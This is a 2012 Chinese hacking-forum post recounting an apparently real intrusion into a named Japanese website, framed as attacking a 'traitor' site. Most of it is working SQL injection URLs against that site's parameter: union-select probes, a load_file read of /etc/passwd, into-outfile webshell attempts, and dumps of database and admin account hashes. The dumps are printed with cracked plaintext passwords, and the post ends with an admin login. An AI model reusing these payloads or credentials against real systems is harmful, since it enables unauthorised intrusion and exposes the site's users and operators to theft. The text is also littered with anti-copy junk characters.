找回密码
 立即注册
查看: 4155|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
补:www.zuaa.jp测试
7 c  g7 {5 T. }" ]% |9 i

" z6 C1 y( ~7 t$ H0x01. 检测 www.zuaa.jp 收集数据
% }  N- _' |+ B7 n& w" a0 r" Y
3 j# g& P; J0 I4 z6 z0 a/ e% {) S  q
0 h, ]. Y: [4 L1 a2 H  ewhatweb
9 H% n" F8 q* S2 }6 e0 P1 |- x4 |" O. Z
1 ~- {7 g6 h. |1 X' X7 {4 h/ E( y2 n* R8 \9 I6 `" {# O9 @
利用NMAP扫描- ?  f* c) m# J* |* e! F0 p$ C

* b: i! U) w! s; }( H6 ?% S" ^! w- m中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持$ f$ U0 n9 s/ p7 Q( A& |! v
0x02.找注入点4 `" G& e0 Y( E' e! J) @" u; g1 B* F
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
+ ]9 z  Z2 E8 F  B: I4 W* I0 k& n/ Z, v) S7 H; V- |$ G. }
$ V4 M% m) W" C. C2 W
0x03.order by
3 f0 z, y% _5 W% E$ D6 M3 q, \             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1' v: u: ]" G# r' }2 ^

& _" s$ [  n0 F' `+ }/ Morder by 28报错,order by 27正常
4 z# {6 j6 y% t: ?- L% v$ X3 U) G+ w1 w( t/ Y; P* \
0x04.   union手动查询' k& R: V) y+ u  a0 q0 }: D
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 # |- U* u3 q% s* L& M/ Q
添加到 27 时正常显示 9 d: z4 W2 [* T4 _% Z+ c9 ~$ d

5 t4 |( R$ x7 U8 P3 x中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
  V. v& L; ~0 G# P2 G8 B! o( j8 s
& F) q3 E% k* Q1 h$ G0x05. info:
! u. m# F* P6 e6 [( xhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 0 b* z- V' V% v& u3 P8 t. `

2 m: |* j/ `8 m4 d) D  Vuser:            root@localhost* ^# r7 e+ k' y6 _6 X2 }2 Y
database:    openpne
& w" Y, o' e( T7 Nversion:      4.1.22
# A8 q" y2 s6 E/ {) ]; pos:             portbld-freebsd5.4
+ \: ]: f1 ^: Y1 W8 P$ x0 ^: q5 g1 X9 |; G( W2 Z
0x06. root用户# Q& s' j# C) Q- e: w, ~
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)5 Q2 k8 f2 t) k& A
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 & D; ^1 v! s1 Q& ?1 M; E3 C

0 u, {) ]# J$ W通过工具转换. ]2 H7 N2 ~8 A! ?+ v

' ^. X2 e6 [% J& H中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持, d+ x& V2 t$ Q5 x, t9 _
- G: z8 A/ U" V, a' Z1 I
0x07. 利用 into outfile
5 j2 |5 s& ^9 i* z* W  w! ~; D% J; p全部都失败  ?1 F" G/ }. T; ?
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
1 @! W9 ?$ x. D+ z3 y/ k2 _
; _4 z9 r! v6 ~$ m% W/ n: Ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 5 J( p* v" X0 d( ?% \
1 m; Q( G8 I+ N- [( [7 a3 ]
页面显示“MDB2 Error:syntax error”% o* V8 |; D# s! q8 s

( t/ t% x8 b1 {0 K) ^) K" c& K0x08. 利用 mysql 4.1
2 r2 W3 o' y1 s' `, m. O$ M猜常规表名,字段未果 工具 sqlmap2 B& b0 I$ g& M8 D+ D
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持2 [  C( |+ o1 J0 a; s

' l0 J& M7 n$ M) |5 |7 U* C( D/ t7 s+ W6 j+ z
( l9 j, f! y5 p' U* _2 E. }# U0 b
0x09. 查找后台: z0 f$ ~+ F. K
利用 现有的各种 后台工具尝试都不行
$ s3 P4 l; D) s6 R$ [  X! g9 p9 w* M& t! Z
0x10.  MySL外联方法
* u; T9 n# L" h4 h3 M从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
2 o4 T6 b' Y* h& ?2 y3 s/ F可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user" n% D. K* G; O, ^) f, H
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user" q" @" Z4 r+ q+ O3 |  J5 K

- P% p$ K% c8 Y) g这个可以在 www.cmd5.com 解密" j, d1 o' p) Y' g7 a
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
2 G1 c4 }: s% d# n4 f- r: y  G. Nchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97# j& P) s& S2 o5 A6 E6 e
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???4 G4 K; [3 \' ?( I/ \
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???4 [% k/ @; y0 p8 K$ E  Q
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知* B# S, c+ R' d) j4 w5 v
& V9 P5 F; Q7 B
7 c8 k7 f0 R6 u) E- A% c& ^
0x11. 网站突破
7 q( L1 C( {5 U$ q( h* Q. B! R发现网站的源程序 openpne, google 下载 openpne 源码
! w5 D, I) A. }- d. F( P3 ]. i9 s) x. D  H1 a9 ?& w  M0 T  ]6 r

. P5 w- X! X2 g( ^5 I6 s- a0x12. 默认信息利用
! Z/ g9 M0 W+ r) E) ]6 ^http://sns.zuaa.jp/?m=admin&a=page_login  b! c$ Q1 o* u, c2 Q& [
8 A) \5 M  \; \1 |' f0 Q
表名 (c_admin_user) ,字段名(username,password)1 |2 }% T& S  x0 I
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
* w# D  z+ Q- Y" X
; z7 y* @7 [, M' s( Q- P解密" Q: a! j8 S$ E
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
- h1 X& |. A! }0 |) yzuaajp:c0923ec5857796a393da99905008c176,          zju1897
; \5 |5 N; s9 o6 r7 P* t
, b+ t$ ~" H" a. q( x' E中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持) W% e/ X+ P1 K) z$ L& r7 i. l

! \# h, ]; B; z3 x4 _0x13. 登录后台* h. N0 Z3 s* [9 V# W+ [$ F
  H" H: L( \, T. d' c$ R0 O1 o

: p; |) j/ Q! {" _3 A- N
, _5 T( t) W. g" G0x14. 小结5 h/ T# l1 R5 R: j& v
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。% A: f' l! d; V. c& K( y
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
1 P3 d/ `3 b3 w; d------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
; s' e) e: k- m" n, i$ O中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持/ P5 ^2 X3 a* J1 v: X0 A

7 d5 @' O4 G1 n) y; Z3 s最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!  P2 A( r& o. t7 R. \

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表